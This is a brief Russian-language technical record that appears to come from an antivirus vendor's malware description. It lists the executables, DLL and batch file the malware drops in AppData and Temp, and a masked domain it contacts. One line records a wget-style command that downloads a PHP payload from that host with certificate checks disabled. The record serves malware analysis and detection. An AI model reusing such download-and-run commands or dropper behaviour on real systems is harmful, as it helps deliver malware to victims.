Техническая информация
- <LS_APPDATA>\F8CF33AD986170E3D24561D4B8B8D76B.EXE -o F70130C44CDD00A372972E2323195E7A -d -t 0 --retry-connrefused -w 5 --random-wait --no-dns-cache --restrict-file-names=windows -nd -nH --no-cache --ignore-length --no-cookies --no-check-certificate --follow-ftp http://cl#####eowatchers.net/adsgk.php
- <SYSTEM32>\cmd.exe /c ""%WINDIR%\Temp\a00293.bat" <Полный путь к вирусу>"
- %WINDIR%\Temp\a00293.bat
- <LS_APPDATA>\F70130C44CDD00A372972E2323195E7A
- <LS_APPDATA>\adsgk.php
- <LS_APPDATA>\pcre3.dll
- <LS_APPDATA>\C0CA437737654CA667038D6B2C1B5D1E.EXE
- <LS_APPDATA>\C907D7A30E7D43AFD00202154480A33A.EXE
- <LS_APPDATA>\F8CF33AD986170E3D24561D4B8B8D76B.EXE
- %WINDIR%\Temp\a00293.bat
- 'cl#####eowatchers.net':80
- cl#####eowatchers.net/adsgk.php
- DNS ASK cl#####eowatchers.net